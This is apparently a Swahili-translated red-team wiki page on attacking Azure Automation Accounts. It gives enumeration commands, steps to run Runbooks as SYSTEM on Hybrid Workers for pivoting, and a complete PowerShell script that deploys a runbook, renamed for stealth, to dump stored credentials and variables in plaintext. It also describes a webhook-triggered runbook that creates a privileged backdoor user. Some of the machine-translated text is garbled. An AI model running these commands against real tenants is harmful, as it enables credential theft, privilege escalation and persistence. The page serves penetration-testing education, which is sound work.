Az - Automation Account

Basic Information

From the docs: Azure Automation inatoa huduma ya automatisering ya msingi ya wingu, masasisho ya mfumo wa uendeshaji, na huduma ya usanidi inayosaidia usimamizi thabiti katika mazingira yako ya Azure na yasiyo ya Azure. Inajumuisha automatisering ya mchakato, usimamizi wa usanidi, usimamizi wa masasisho, uwezo wa pamoja, na vipengele tofauti.

Hizi ni kama "kazi zilizopangwa" katika Azure ambazo zitakuruhusu kutekeleza mambo (vitendo au hata skripti) ili kusimamia, kuangalia na kuunda mazingira ya Azure.

Run As Account

Wakati Run as Account inatumika, inaunda maombi ya Azure AD yenye cheti kilichojisaini, inaunda mwakilishi wa huduma na inatoa jukumu la Mchangiaji kwa akaunti katika usajili wa sasa (privileges nyingi). Microsoft inapendekeza kutumia Identiti Iliyosimamiwa kwa Akaunti ya Automation.

Runbooks & Jobs

Runbooks zinakuruhusu kutekeleza msimbo wa PowerShell wa kawaida. Hii inaweza kutiliwa shaka na mshambuliaji ili kuiba ruhusa za mwakilishi ulioambatanishwa (ikiwa upo). Katika msimbo wa Runbooks unaweza pia kupata habari nyeti (kama vile creds).

Ikiwa unaweza kusoma kazi, fanya hivyo kwani zinabeba matokeo ya kukimbia (habari nyeti zinazoweza kuwa).

Nenda kwa Automation Accounts --> <Select Automation Account> --> Runbooks/Jobs/Hybrid worker groups/Watcher tasks/credentials/variables/certificates/connections

Hybrid Worker

Runbook inaweza kukimbizwa katika konteina ndani ya Azure au katika Hybrid Worker (mashine isiyo ya azure). Log Analytics Agent inapelekwa kwenye VM ili kuisajili kama mfanyakazi wa hybrid. Kazi za mfanyakazi wa hybrid zinakimbizwa kama SYSTEM kwenye Windows na akaunti ya nxautomation kwenye Linux. Kila Mfanyakazi wa Hybrid anasajiliwa katika Kikundi cha Wafanyakazi wa Hybrid.

Hivyo, ikiwa unaweza kuchagua kukimbiza Runbook katika Mfanyakazi wa Hybrid wa Windows, utaweza kutekeleza amri za kawaida ndani ya mashine ya nje kama System (mbinu nzuri ya pivot).

Compromise State Configuration (SC)

From the docs: Azure Automation State Configuration ni huduma ya usimamizi wa usanidi wa Azure inayokuruhusu kuandika, kusimamia, na kukusanya Usanidi wa Nchi ya PowerShell (DSC) usanidi kwa nodi katika wingu lolote au kituo cha data cha ndani. Huduma pia inaingiza Rasilimali za DSC, na inatoa usanidi kwa nodi lengwa, yote katika wingu. Unaweza kufikia Usanidi wa Nchi ya Azure Automation katika lango la Azure kwa kuchagua Usanidi wa Nchi (DSC) chini ya Usimamizi wa Usanidi.

Habari nyeti zinaweza kupatikana katika usanidi hizi.

RCE

Inawezekana kutumia SC kutekeleza skripti za kawaida katika mashine zinazodhibitiwa.

Enumeration

# Check user right for automation
az extension add --upgrade -n automation
az automation account list # if it doesn't return anything the user is not a part of an Automation group

# Gets Azure Automation accounts in a resource group
Get-AzAutomationAccount

# List & get DSC configs
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -match '<name>'} | Export-AzAutomationDscConfiguration -OutputFolder . -Debug
## Automation Accounts named SecurityBaselineConfigurationWS... are there by default (not interesting)

# List & get Run books code
Get-AzAutomationAccount | Get-AzAutomationRunbook
Get-AzAutomationAccount | Get-AzAutomationRunbook | Export-AzAutomationRunbook -OutputFolder /tmp

# List credentials & variables & others
Get-AzAutomationAccount | Get-AzAutomationCredential
Get-AzAutomationAccount | Get-AzAutomationVariable
Get-AzAutomationAccount | Get-AzAutomationConnection
Get-AzAutomationAccount | Get-AzAutomationCertificate
Get-AzAutomationAccount | Get-AzAutomationSchedule
Get-AzAutomationAccount | Get-AzAutomationModule
Get-AzAutomationAccount | Get-AzAutomationPython3Package
## Exfiltrate credentials & variables and the other info loading them in a Runbook and printing them

# List hybrid workers
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>

Unda Runbook

# Get the role of a user on the Automation account
# Contributor or higher = Can create and execute Runbooks
Get-AzRoleAssignment -Scope /subscriptions/<ID>/resourceGroups/<RG-NAME>/providers/Microsoft.Automation/automationAccounts/<AUTOMATION-ACCOUNT>

# Create a Powershell Runbook
Import-AzAutomationRunbook -Name <RUNBOOK-NAME> -Path C:\Tools\username.ps1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Type PowerShell -Force -Verbose

# Publish the Runbook
Publish-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose

# Start the Runbook
Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose

Pata Creds & Variables zilizofafanuliwa katika Akaunti ya Automation kwa kutumia Kitabu cha Kimbunga

# Change the crdentials & variables names and add as many as you need
@'
$creds = Get-AutomationPSCredential -Name <credentials_name>
$runbook_variable = Get-AutomationVariable -name <variable_name>
$runbook_variable
$creds.GetNetworkCredential().username
$creds.GetNetworkCredential().password
'@ | out-file -encoding ascii 'runbook_get_creds.ps1'

$ResourceGroupName = '<resource_group_name>'
$AutomationAccountName = '<auto_acc_name>'
$RunBookName = 'Exif-Credentials' #Change this for stealthness

# Creare Run book, publish, start, and get output
New-AzAutomationRunBook -name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Type PowerShell
Import-AzAutomationRunBook -Path 'runbook_get_creds.ps1' -Name $RunBookName -Type PowerShell -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Force
Publish-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
$start = Start-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
start-sleep 20
($start | Get-AzAutomationJob | Get-AzAutomationJobOutput).Summarynt

Hatua za Kuweka Mchakato wa Kuunda Mtumiaji wa Juu Kiotomatiki

1. Anzisha Akaunti ya Kiotomatiki

• Hatua Inayohitajika: Unda Akaunti mpya ya Kiotomatiki.

• Mipangilio Maalum: Hakikisha "Create Azure Run As account" imewezeshwa.

2. Ingiza na Weka Mchakato wa Kuendesha

• Chanzo: Pakua mchakato wa mfano kutoka MicroBurst GitHub Repository.

• Hatua Zinazohitajika:

• Ingiza mchakato wa kuendesha kwenye Akaunti ya Kiotomatiki.

• Chapisha mchakato wa kuendesha ili uweze kutekelezwa.

• Unganisha webhook kwa mchakato wa kuendesha, kuwezesha vichocheo vya nje.

3. Sanidi Moduli ya AzureAD

• Hatua Inayohitajika: Ongeza moduli ya AzureAD kwenye Akaunti ya Kiotomatiki.

• Hatua ya Ziada: Hakikisha moduli zote za Azure Automation zimeboreshwa hadi toleo zao za hivi punde.

4. Ugawaji wa Ruhusa

• Majukumu ya Kuteua:

• Msimamizi wa Mtumiaji

• Mmiliki wa Usajili

• Lengo: Gawa majukumu haya kwa Akaunti ya Kiotomatiki kwa ruhusa zinazohitajika.

5. Ufahamu wa Kupoteza Upatikanaji

• Kumbuka: Kuwa makini kwamba kusanidi kiotomatiki kama hiki kunaweza kusababisha kupoteza udhibiti wa usajili.

6. Chochea Uundaji wa Mtumiaji

• Chochea webhook ili kuunda mtumiaji mpya kwa kutuma ombi la POST.

• Tumia script ya PowerShell iliyotolewa, hakikisha kubadilisha $uri na URL yako halisi ya webhook na kuboresha $AccountInfo na jina la mtumiaji na nenosiri unalotaka.

$uri = "<YOUR_WEBHOOK_URL>"
$AccountInfo  = @(@{RequestBody=@{Username="<DESIRED_USERNAME>";Password="<DESIRED_PASSWORD>"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body

References

• https://learn.microsoft.com/en-us/azure/automation/overview

• https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview

• https://github.com/rootsecdev/Azure-Red-Team#runbook-automation